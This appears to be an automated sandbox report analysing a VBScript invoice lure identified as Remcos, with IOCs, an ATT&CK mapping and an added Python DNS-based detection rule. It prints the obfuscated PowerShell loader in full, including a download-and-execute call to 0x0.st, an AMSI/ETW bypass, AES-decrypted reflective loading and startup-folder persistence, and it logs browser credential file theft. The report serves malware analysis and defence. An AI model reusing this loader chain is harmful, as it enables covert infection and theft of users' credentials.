decompress_function($param_var){$MLDOJ=New-Object System.IO.MemoryStream(,$param_var);$ILPTT=New-Object System.IO.MemoryStream;$ATXCE=New-Object System.IO.Compression.GZipStream($MLDOJ,[IO.Compression.CompressionMode]::Decompress);$ATXCE.CopyTo($ILPTT);$ATXCE.Dispose();$MLDOJ.Dispose();$ILPTT.Dispose();$ILPTT.ToArray();}$line_var=[System.IO.File]::($POIJOGD[0])([Console]::Title);$payload2_var=decompress_function (SJDOX ([Convert]::FromBase64String([System.Linq.Enumerable]::($POIJOGD[1])($line_var, 6).Substring(2))));[System.Reflection.Assembly]::Load([byte[]]$payload2_var).EntryPoint.Invoke($null,$null); "
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_75adaf3d.cmd"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_75adaf3d.cmd';$POIJOGD='ReadLEKOXCULineEKOXCULsEKOXCUL'.Replace('EKOXCUL', ''),'ETZYUBRBleTZYUBRBmenTZYUBRBtTZYUBRBAtTZYUBRB'.Replace('TZYUBRB', '');powershell -w hidden;iex (($([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('U1RSSU5HUkFORE9NaVNUUklOR1JBTkRPTWVTVFJJTkdSQU5ET014ICgoaVNUUklOR1JBTkRPTXdTVFJJTkdSQU5ET01yU1RSSU5HUkFORE9NIC1TVFJJTkdSQU5ET01VU1RSSU5HUkFORE9Nc1NUUklOR1JBTkRPTWVTVFJJTkdSQU5ET01CU1RSSU5HUkFORE9NYVNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET01pU1RSSU5HUkFORE9NY1NUUklOR1JBTkRPTVBTVFJJTkdSQU5ET01hU1RSSU5HUkFORE9NclNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET01pU1RSSU5HUkFORE9NblNUUklOR1JBTkRPTWdTVFJJTkdSQU5ET00gIlNUUklOR1JBTkRPTWhTVFJJTkdSQU5ET010dHBzU1RSSU5HUkFORE9NOlNUUklOR1JBTkRPTS9TVFJJTkdSQU5ET00vU1RSSU5HUkFORE9NMFNUUklOR1JBTkRPTXhTVFJJTkdSQU5ET00wU1RSSU5HUkFORE9NLlNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET010U1RSSU5HUkFORE9NL1NUUklOR1JBTkRPTThTVFJJTkdSQU5ET01aU1RSSU5HUkFORE9NRFNUUklOR1JBTkRPTWFTVFJJTkdSQU5ET00uU1RSSU5HUkFORE9NdFNUUklOR1JBTkRPTXhTVFJJTkdSQU5ET010U1RSSU5HUkFORE9NIikuQ29udGVudC5SZXBsYWNlKCdBQkMnLCcnKSkgLUVycm9yQWN0aW9uIFNpbGVudGx5Q29udGludWU7')))) -replace 'STRINGRANDOM', '');try{iex ((iex (('Invoke-SystemAmsiBypass -DisableETW;').Replace('TTTTT',''))).Content) -ErrorAction Stop}catch{"This system has a modified AMSI"};function SJDOX($param_var){$aes_var=[System.Security.Cryptography.Aes]::Create();$aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC;$aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$aes_var.Key=[System.Convert]::FromBase64String('WrTop3Dy2uR/7q23aw8qRRYFs5pR6KKW0qPOi2nk/SM=');$aes_var.IV=[System.Convert]::FromBase64String('X0OAAhUhQtx3irmnKHjIpQ==');$CPBHM=$aes_var.CreateDecryptor();$DWTPO=$CPBHM.TransformFinalBlock($param_var,0,$param_var.Length);$CPBHM.Dispose();$aes_var.Dispose();$DWTPO;}function decompress_function($param_var){$MLDOJ=New-Object System.IO.MemoryStream(,$param_var);$ILPTT=New-Object System.IO.MemoryStream;$ATXCE=New-Object System.IO.Compression.GZipStream($MLDOJ,[IO.Compression.CompressionMode]::Decompress);$ATXCE.CopyTo($ILPTT);$ATXCE.Dispose();$MLDOJ.Dispose();$ILPTT.Dispose();$ILPTT.ToArray();}$line_var=[System.IO.File]::($POIJOGD[0])([Console]::Title);$payload2_var=decompress_function (SJDOX ([Convert]::FromBase64String([System.Linq.Enumerable]::($POIJOGD[1])($line_var, 6).Substring(2))));[System.Reflection.Assembly]::Load([byte[]]$payload2_var).EntryPoint.Invoke($null,$null); "
Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
MITRE ATT&CK Matrix (one line per tactic; leading numbers are the report's count badges, kept as extracted)

Reconnaissance: Gather Victim Identity Information | Credentials | Email Addresses | Employee Names | Gather Victim Network Information | Domain Properties | DNS
Resource Development: 222 Scripting | Domains | DNS Server | Virtual Private Server | Server | Botnet | Web Services
Initial Access: Valid Accounts | Default Accounts | Domain Accounts | Local Accounts | Cloud Accounts | Replication Through Removable Media | External Remote Services
Execution: 122 Command and Scripting Interpreter | 1 Exploitation for Client Execution | 21 PowerShell | Cron | Launchd | Scheduled Task | Systemd Timers
Persistence: 222 Scripting | 2 Registry Run Keys / Startup Folder | 1 DLL Side-Loading | Login Hook | Network Logon Script | RC Scripts | Startup Items
Privilege Escalation: 11 Process Injection | 2 Registry Run Keys / Startup Folder | 1 DLL Side-Loading | Login Hook | Network Logon Script | RC Scripts | Startup Items
Defense Evasion: 1 Masquerading | 21 Virtualization/Sandbox Evasion | 11 Process Injection | 1 Obfuscated Files or Information | 1 Software Packing | 1 DLL Side-Loading | Compile After Delivery
Credential Access: 1 OS Credential Dumping | LSASS Memory | Security Account Manager | NTDS | LSA Secrets | Cached Domain Credentials | DCSync
Discovery: 1 Security Software Discovery | 1 Process Discovery | 21 Virtualization/Sandbox Evasion | 1 Application Window Discovery | 1 System Network Configuration Discovery | 2 File and Directory Discovery | 12 System Information Discovery
Lateral Movement: Remote Services | Remote Desktop Protocol | SMB/Windows Admin Shares | Distributed Component Object Model | SSH | VNC | Windows Remote Management
Collection: 1 Data from Local System | Data from Removable Media | Data from Network Shared Drive | Input Capture | Keylogging | GUI Input Capture | Web Portal Capture
Command and Control: 1 Encrypted Channel | 1 Ingress Tool Transfer | 2 Non-Application Layer Protocol | 13 Application Layer Protocol | Fallback Channels | Multiband Communication | Commonly Used Port
Exfiltration: Exfiltration Over Other Network Medium | Exfiltration Over Bluetooth | Automated Exfiltration | Traffic Duplication | Scheduled Transfer | Data Transfer Size Limits | Exfiltration Over C2 Channel
Impact: Abuse Accessibility Features | Network Denial of Service | Data Encrypted for Impact | Data Destruction | Data Encrypted for Impact | Service Stop | Inhibit System Recovery
Behavior Graph (ID 1617742; sample "Commercial Invoice Confirma..."; start date 18/02/2025; architecture WINDOWS; score 100). Rebuilt as a process tree from the rendered graph; the bracketed numbers after a process are the created-file / registry-value counts the graph shows beside it.

Start (sample)
  signatures: Multi AV Scanner detection for submitted file; Sigma detected: Drops script at startup location; Sample has a suspicious name (potential lure to open the executable); 4 other signatures
  DNS/IP: reallyfreegeoip.org (signature: Tries to detect the country of the analysis system (by using the IP)); checkip.dyndns.org; 2 other IPs or domains
  +-- wscript.exe [2]
  |     dropped: C:\Users\user\AppData\Local\...\3h6QL1gQ.bat (ASCII)
  |     signatures: VBScript performs obfuscated calls to suspicious functions; Wscript starts Powershell (via cmd or directly); Windows Scripting host queries suspicious COM object (likely to drop second stage); Suspicious execution chain found
  |     +-- cmd.exe [1]
  |           signatures: Wscript starts Powershell (via cmd or directly); Suspicious command line found
  |           +-- conhost.exe
  |           +-- cmd.exe [1]
  |                 signatures: Wscript starts Powershell (via cmd or directly); Suspicious command line found
  |                 +-- conhost.exe
  |                 +-- cmd.exe [1]
  |                 +-- powershell.exe [15 17]
  |                       DNS/IP: checkip.dyndns.com (132.226.247.73; ports 49706, 49711, 80; UTMEMUS, United States); 0x0.st (168.119.145.117; ports 443, 49705, 49710; HETZNER-ASDE, Germany); reallyfreegeoip.org (104.21.16.1; ports 443, 49707, 49712; CLOUDFLARENETUS, United States)
  |                       dropped: C:\Users\user\...\StartupScript_75adaf3d.cmd (ASCII)
  |                       signatures: Suspicious powershell command line found; Found suspicious powershell code related to unpacking or dynamic code loading
  |                       +-- powershell.exe [8]
  +-- cmd.exe [1]
        +-- conhost.exe
        +-- cmd.exe [1]
              +-- conhost.exe
              +-- cmd.exe [1]
              +-- powershell.exe
                    signatures: Suspicious powershell command line found; Tries to harvest and steal browser information (history, passwords, etc)
                    +-- powershell.exe

Initial sample (Source | Detection | Scanner | Label):
Commercial Invoice Confirmation-1132346.vbs | 13% | Virustotal |
Commercial Invoice Confirmation-1132346.vbs | 11% | ReversingLabs | Script-WScript.Trojan.Remcos
Dropped files: No Antivirus matches
Unpacked PE files: No Antivirus matches
Domains: No Antivirus matches
URLs (Source | Detection | Scanner | Label):
https://0x0.st/8ZDa.txt | 0% | Avira URL Cloud | safe
Contacted domains (Name | IP | Active | Malicious | Antivirus Detection | Reputation):
reallyfreegeoip.org | 104.21.16.1 | true | false | | high
0x0.st | 168.119.145.117 | true | false | | high
checkip.dyndns.com | 132.226.247.73 | true | false | | high
checkip.dyndns.org | unknown | unknown | false | | high

Contacted URLs (Name | Malicious | Antivirus Detection | Reputation):
https://0x0.st/8ZDa.txt | false | Avira URL Cloud: safe | unknown
http://checkip.dyndns.org/ | false | | high
https://reallyfreegeoip.org/xml/8.46.123.189 | false | | high
URLs from memory and binaries (Name | Source | Malicious | Antivirus Detection | Reputation):
https://aka.ms/pscore6lB | powershell.exe, 00000008.00000002.1451631801.00000000048B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1451631801.00000000048A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1615757671.00000000047D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1615757671.00000000047E8000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000008.00000002.1451631801.0000000004882000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1615757671.0000000004805000.00000004.00000800.00020000.00000000.sdmp | false | | high
Contacted IPs (IP | Domain | Country | ASN | ASN Name | Malicious):
104.21.16.1 | reallyfreegeoip.org | United States | 13335 | CLOUDFLARENETUS | false
168.119.145.117 | 0x0.st | Germany | 24940 | HETZNER-ASDE | false
132.226.247.73 | checkip.dyndns.com | United States | 16989 | UTMEMUS | false
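Turning the domains above into a detection, as an added example that is not part of the Joe Sandbox report: the checkip hosts and reallyfreegeoip.org are each also queried by legitimate software, so the rule keys on a single client resolving an IP-lookup domain and the geolocation domain within a short window, which is the sequence the PowerShell stage performs here (public IP first, then the country lookup). The log format, client addresses and timestamps are constructed for the example.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Domains the report records the PowerShell stage resolving. The checkip hosts
# return the victim's public IP; reallyfreegeoip.org maps it to a country.
IP_LOOKUP_DOMAINS = {"checkip.dyndns.org", "checkip.dyndns.com"}
GEO_DOMAINS = {"reallyfreegeoip.org"}

# Constructed DNS query log (not from the report): "<ISO timestamp> <client> <qname>".
# 10.0.0.15 mirrors the sandbox sequence; 10.0.0.22 queries both domains but
# hours apart; 10.0.0.40 is benign noise.
SAMPLE_DNS_LOG = """\
2025-02-18T08:24:30Z 10.0.0.15 checkip.dyndns.org
2025-02-18T08:24:31Z 10.0.0.15 checkip.dyndns.com
2025-02-18T08:24:32Z 10.0.0.15 reallyfreegeoip.org
2025-02-18T08:24:33Z 10.0.0.15 0x0.st
2025-02-18T08:30:00Z 10.0.0.22 checkip.dyndns.org
2025-02-18T10:15:00Z 10.0.0.22 reallyfreegeoip.org
2025-02-18T08:25:00Z 10.0.0.40 www.example.com
"""


def parse_dns_log(text):
    """Yield (timestamp, client, qname); qnames are lower-cased and stripped of a
    trailing dot so 'Checkip.DynDNS.org.' still matches the sets above."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 3:
            continue
        ts = datetime.strptime(parts[0], "%Y-%m-%dT%H:%M:%SZ")
        yield ts, parts[1], parts[2].lower().rstrip(".")


def find_geo_check_beacons(log_text, window_seconds=300):
    """Return {client: first timestamp} for each client that resolves an
    IP-lookup domain and a geolocation domain within window_seconds of each
    other. Events are sorted per client, so the log need not be ordered."""
    window = timedelta(seconds=window_seconds)
    per_client = defaultdict(list)
    for ts, client, qname in parse_dns_log(log_text):
        if qname in IP_LOOKUP_DOMAINS or qname in GEO_DOMAINS:
            per_client[client].append((ts, qname))

    hits = {}
    for client, events in per_client.items():
        events.sort()
        for i, (start, _) in enumerate(events):
            # Every relevant query that falls inside the window opened at `start`.
            seen = {q for ts, q in events[i:] if ts - start <= window}
            if seen & IP_LOOKUP_DOMAINS and seen & GEO_DOMAINS:
                hits[client] = start
                break
    return hits


if __name__ == "__main__":
    for client, when in sorted(find_geo_check_beacons(SAMPLE_DNS_LOG).items()):
        print(f"{client}: IP lookup + geolocation within 5 min, first seen {when:%H:%M:%S}")
```

A five-minute window is tight on purpose: the sandbox run shows the two lookups seconds apart, and widening the window mostly adds hosts where an update agent and a browser happen to query the two services independently.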
                  Joe Sandbox version:42.0.0 Malachite
                  Analysis ID:1617742
                  Start date and time:2025-02-18 08:23:31 +01:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 5m 19s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:20
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:Commercial Invoice Confirmation-1132346.vbs
                  Detection:MAL
                  Classification:mal100.spyw.expl.evad.winVBS@25/14@3/3
                  EGA Information:Failed
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 6
                  • Number of non-executed functions: 0
                  Cookbook Comments:
                  • Found application associated with file extension: .vbs
                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                  • Excluded IPs from analysis (whitelisted): 4.245.163.56
                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                  • Execution Graph export aborted for target powershell.exe, PID 8180 because it is empty
• Not all processes were analyzed, report is missing behavior information
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
02:24:31 | API Interceptor | 3633342x Sleep call for process: powershell.exe modified
08:24:37 | AutostartRun | C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_75adaf3d.cmd
Context: contacted IPs (Match, then Associated Sample Name / URL | Threat Name | Context; every listed sample was detected as malicious, and the SHA 256 and Link columns of the original table are links without text)

104.21.16.1
  PO from tpc Type 34.1 34,2 35 Spec.js | FormBook | www.lucynoel6465.shop/jgkl/
  PO from tpc Type 34.1 34,2 35 Spec 1.js | FormBook | www.tumbetgirislinki.fit/k566/
  ebu.ps1 | FormBook | www.fz977.xyz/48bq/
  BIS_MT103 101T000000121121.exe | FormBook | www.cheapwil.shop/ekxu/
  crypt.exe | FormBook | www.clouser.store/0izs/
  ReODK2A5DB.exe | FormBook | www.sigaque.today/n61y/
  xBA5hw2TjG.exe | FormBook | www.fz977.xyz/406r/
  jKR1K8ayHT.exe | FormBook | www.axis138ae.shop/do5s/
  greatnamechangedwithgoodnews.hta | Cobalt Strike, FormBook | www.shlomi.app/r0jq/
  http://dryade.cutegreetingcakes.com/ga/click/2-263541735-21475-52792-103465-64017-800122d652-72691c1ea5 | Unknown | dryade.cutegreetingcakes.com/ga/click/2-263541735-21475-52792-103465-64017-800122d652-72691c1ea5
168.119.145.117
  Maersk_shipping_documents_Awb_BL_Inv000000000000000000000pdf.bat | Unknown
  Awb_Shipping_Documents_0000000.bat | Unknown
  ShippingdocumentsAwbBLInv0000000pdf.vbs | Unknown
  0000000.bat | Unknown
  Xclient.vbs | AsyncRAT, XWorm
  OC 23558 EINSA F2420.vbs | Unknown
  Teufelberger,pdf.vbs | Remcos, PureLog Stealer, zgRAT
  REMMITTANCE ADVICE- 12.02.25_PNG.vbs | Unknown
  Attached order.vbs | Unknown
  tOpxHK0Z2U.bat | Remcos
132.226.247.73
  rJustificante67.exe | GuLoader, Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
  mMS2hfsyJd.img | MassLogger RAT | checkip.dyndns.org/
  Nonmerchantable.exe | GuLoader, Snake Keylogger | checkip.dyndns.org/
  JUSTIFICANTE DE TRANSFERENCIA.exe | GuLoader, Snake Keylogger | checkip.dyndns.org/
  Hermaean.exe | GuLoader, MassLogger RAT | checkip.dyndns.org/
  24602711 OR Invoice.pdf.scr | MassLogger RAT | checkip.dyndns.org/
  Purchase Order No.1364.exe | Snake Keylogger | checkip.dyndns.org/
  4a. RFx-4045.exe | GuLoader, Snake Keylogger | checkip.dyndns.org/
  RFQ-Ref-QE-69774-LD,PDF.vbs | DBatLoader, MassLogger RAT, PureLog Stealer | checkip.dyndns.org/
  Q-M20251302.exe | GuLoader, Snake Keylogger | checkip.dyndns.org/
Context: contacted domains (Match, then Associated Sample Name / URL | Threat Name | Context, where the context is the IP the domain resolved to in that analysis; every listed sample was detected as malicious)

checkip.dyndns.com
  jjmax il.vbs | Snake Keylogger, VIP Keylogger | 132.226.8.169
  FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe | DBatLoader, Snake Keylogger, VIP Keylogger | 132.226.8.169
  nDHL_CUSTOM_CLEARANCE_FORM_3409249_pdf.exe | GuLoader, MassLogger RAT | 193.122.6.168
  DHL AWB Document_pdf.exe | GuLoader, Snake Keylogger | 193.122.130.0
  useeeerrrrr.js | Snake Keylogger, VIP Keylogger | 193.122.130.0
  15300429772_20250121_09114163_HesapOzeti.exe | Snake Keylogger | 193.122.130.0
  swift copy.bat.exe | Snake Keylogger | 193.122.6.168
  Order007556.exe | Snake Keylogger | 158.101.44.242
  Ziraat_Bankasi_Swift_Messaji.cmd | DBatLoader, Snake Keylogger, VIP Keylogger | 158.101.44.242
  rJustificante67.exe | GuLoader, Snake Keylogger, VIP Keylogger | 132.226.247.73
0x0.st
  Maersk_shipping_documents_Awb_BL_Inv000000000000000000000pdf.bat | Unknown | 168.119.145.117
  Awb_Shipping_Documents_0000000.bat | Unknown | 168.119.145.117
  ShippingdocumentsAwbBLInv0000000pdf.vbs | Unknown | 168.119.145.117
  0000000.bat | Unknown | 168.119.145.117
  Xclient.vbs | AsyncRAT, XWorm | 168.119.145.117
  OC 23558 EINSA F2420.vbs | Unknown | 168.119.145.117
  Teufelberger,pdf.vbs | Remcos, PureLog Stealer, zgRAT | 168.119.145.117
  REMMITTANCE ADVICE- 12.02.25_PNG.vbs | Unknown | 168.119.145.117
  Attached order.vbs | Unknown | 168.119.145.117
  tOpxHK0Z2U.bat | Remcos | 168.119.145.117
reallyfreegeoip.org
  jjmax il.vbs | Snake Keylogger, VIP Keylogger | 104.21.64.1
  FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe | DBatLoader, Snake Keylogger, VIP Keylogger | 104.21.32.1
  nDHL_CUSTOM_CLEARANCE_FORM_3409249_pdf.exe | GuLoader, MassLogger RAT | 104.21.96.1
  DHL AWB Document_pdf.exe | GuLoader, Snake Keylogger | 104.21.32.1
  useeeerrrrr.js | Snake Keylogger, VIP Keylogger | 104.21.80.1
  15300429772_20250121_09114163_HesapOzeti.exe | Snake Keylogger | 104.21.80.1
  swift copy.bat.exe | Snake Keylogger | 104.21.32.1
  Order007556.exe | Snake Keylogger | 104.21.64.1
  Ziraat_Bankasi_Swift_Messaji.cmd | DBatLoader, Snake Keylogger, VIP Keylogger | 104.21.112.1
  rJustificante67.exe | GuLoader, Snake Keylogger, VIP Keylogger | 104.21.64.1
Context: ASNs (Match, then Associated Sample Name / URL | Threat Name | Context, where the context is the IP in that ASN the sample contacted; every listed sample was detected as malicious)

CLOUDFLARENETUS
  jjmax il.vbs | Snake Keylogger, VIP Keylogger | 104.21.64.1
  Payment_Activity_0104_2025-2-17.vbs | Unknown | 104.22.74.216
  Payment_Activity_0104_2025-2-17.vbs | Unknown | 172.67.74.232
  Payment_Activity_0104_2025-2-17.vbs | Unknown | 104.18.27.193
  FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe | DBatLoader, Snake Keylogger, VIP Keylogger | 104.21.32.1
  Payment_Activity_0079_2025-2-17.vbs | Unknown | 104.18.27.193
  Payment_Activity_0079_2025-2-17.vbs | Unknown | 172.67.23.234
  Payment_Activity_0079_2025-2-17.vbs | Unknown | 104.18.66.57
  payment1.js | FormBook | 104.21.16.1
  Rooming list.js | Remcos | 104.20.3.235
HETZNER-ASDE
  2024-02-17.js | FormBook | 144.76.229.203
  PO.exe | FormBook | 144.76.229.203
  na.elf | Prometei | 88.198.246.242
  ORD_VIO-002-2025e-O001.exe | FormBook | 144.76.229.203
  Maersk_shipping_documents_Awb_BL_Inv000000000000000000000pdf.bat | Unknown | 168.119.145.117
  Xw9oZv75Ze.exe | Amadey, LummaC Stealer, Stealc, Vidar | 5.75.210.149
  LWWWDBoeGo.exe | Amadey, GCleaner, LummaC Stealer, Vidar | 5.75.210.149
  hHtR1O06GH.exe | Amadey, Healer AV Disabler, LummaC Stealer, Stealc, Vidar | 5.75.210.149
  na.elf | Prometei | 88.198.246.242
  na.elf | Prometei | 88.198.246.242
UTMEMUS
  jjmax il.vbs | Snake Keylogger, VIP Keylogger | 132.226.8.169
  FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe | DBatLoader, Snake Keylogger, VIP Keylogger | 132.226.8.169
  rJustificante67.exe | GuLoader, Snake Keylogger, VIP Keylogger | 132.226.247.73
  rJustificante67.exe | GuLoader, Snake Keylogger | 132.226.8.169
  mMS2hfsyJd.img | MassLogger RAT | 132.226.247.73
  REQUIRED-ORDER-REFERENCE-WITH-COMPANY-DETAILS.cmd | DBatLoader, MassLogger RAT, PureLog Stealer | 132.226.8.169
  Nonmerchantable.exe | GuLoader, Snake Keylogger | 132.226.247.73
  pfYNBAkPIwsCPTS.exe | MassLogger RAT | 132.226.8.169
  JUSTIFICANTE DE TRANSFERENCIA.exe | GuLoader, Snake Keylogger | 132.226.247.73
  Hermaean.exe | GuLoader, MassLogger RAT | 132.226.247.73
Context: JA3 fingerprints (Match, then Associated Sample Name / URL | Threat Name | Context, where the context is the IPs the same TLS client fingerprint was seen contacting; every listed sample was detected as malicious)

3b5074b1b5d032e5620f69f9f700ff0e
  jjmax il.vbs | Snake Keylogger, VIP Keylogger | 168.119.145.117, 104.21.16.1
  Payment_Activity_0104_2025-2-17.vbs | Unknown | 168.119.145.117, 104.21.16.1
  Payment_Activity_0104_2025-2-17.vbs | Unknown | 168.119.145.117, 104.21.16.1
  Payment_Activity_0104_2025-2-17.vbs | Unknown | 168.119.145.117, 104.21.16.1
  FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe | DBatLoader, Snake Keylogger, VIP Keylogger | 168.119.145.117, 104.21.16.1
  Payment_Activity_0079_2025-2-17.vbs | Unknown | 168.119.145.117, 104.21.16.1
  Payment_Activity_0079_2025-2-17.vbs | Unknown | 168.119.145.117, 104.21.16.1
  Payment_Activity_0079_2025-2-17.vbs | Unknown | 168.119.145.117, 104.21.16.1
  Rooming list.js | Remcos | 168.119.145.117, 104.21.16.1
  nDHL_CUSTOM_CLEARANCE_FORM_3409249_pdf.exe | GuLoader, MassLogger RAT | 168.119.145.117, 104.21.16.1
                                      No context
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:modified
                                      Size (bytes):5829
                                      Entropy (8bit):4.901113710259376
                                      Encrypted:false
                                      SSDEEP:96:ZCJ2Woe5H2k6Lm5emmXIGLgyg12jDs+un/iQLEYFjDaeWJ6KGcmXlQ9smpFRLcUn:Uxoe5HVsm5emdQgkjDt4iWN3yBGHVQ9v
                                      MD5:7827E04B3ECD71FB3BD7BEEE4CA52CE8
                                      SHA1:22813AF893013D1CCCACC305523301BB90FF88D9
                                      SHA-256:5D66D4CA13B4AF3B23357EB9BC21694E7EED4485EA8D2B8C653BEF3A8E5D0601
                                      SHA-512:D5F6604E49B7B31C2D1DA5E59B676C0E0F37710F4867F232DF0AA9A1EE170B399472CA1DF0BD21DF702A1B5005921D35A8E6858432B00619E65D0648C74C096B
                                      Malicious:false
                                      Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):64
                                      Entropy (8bit):0.34726597513537405
                                      Encrypted:false
                                      SSDEEP:3:Nlll:Nll
                                      MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                      SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                      SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                      SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
